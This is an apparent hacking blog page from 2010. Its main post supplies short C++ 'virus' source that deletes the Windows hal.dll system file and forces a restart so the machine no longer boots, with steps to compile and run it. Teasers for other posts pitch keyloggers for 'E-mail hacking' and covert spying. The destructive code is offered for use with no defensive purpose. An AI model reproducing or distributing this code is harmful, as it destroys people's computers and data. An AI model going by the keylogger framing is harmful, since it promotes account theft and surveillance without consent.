#Post Title #Post Title #Post Title
Saturday, October 9, 2010

How to create a simple virus using c++




In this blog Iam going to show you how to create a simple virus using c++ language.It's simple but destructive...let's do it.
virus is something which illegally controlls the user pc without his/her permission.viruses like Trojan horse,back doors,computer viruses are dangerous..virus which is explained in this blog is dangerous so don't try it on your system and use it at your own risk..This virus will delete the hal.dll(this  file helps the system in startup)in your system32 folder.After performing such task your will no longer will be able to start your system.....

Here is the source code:
-------------------------------------------------------------------
#include <cstdlib>
#include <iostream>
using namespace std;
int main(int argc, char *argv[])
{
   std::remove("C:\\windows\\system32\\hal.dll");
    system("shutdown -s -r");
    system("PAUSE");
    return EXIT_SUCCESS;
}
-------------------------------------------------------------------

NOTE: The source code of virus is not fake...it's real and destructive.

After typing the above source code in  notepad .save the file as bee.cpp.
 After saving...
compile the source file ...(to compile c++ source file see How to compile c++ programs ?)
You will get a .exe file
On opening the .exe file your system will restart and crash...


NOTE: If  you have any Questions regarding this post please comment .........

[ Read More ]

How to compile C++ programs?

                                        

                                                          


                                            

In many of my previous posts especially in the "How to create a simple virus " section, I have used C++ as the programming language. If you’re new to C++ programming and find it difficult to compile the C++ source codes then this post is for you.Here Iam again to show you  How to compile C++ programs ..........
 its simple than it seems.........
 This post contains two parts :-
 1) Intalling C++ compiler
 2) Configuring the intallled the program

Read more>>

[ Read More ]
Tuesday, October 5, 2010

E-mail Hacking using a keylogger:it's simple

How to hack an E-mail ID ? How to Spy on a computer ? What is a keylogger? What is it? How does it work? etc..Solutions for these questions are solved in this post . Iam sure that this will help in hacking an E-Mail..

What is a keylogger?
keylogger is a basically a software which records each and every keystrokes of the user and prints it in the text file.These are meant for spying purpose,E-mail hacking, and even for spying on children.Using keyloggers is a technique applied by many people to hack passwords.
They are of two Types of  Keyloggers:
*Hardware keyloggers
*software keyloggers

Read more>>

[ Read More ]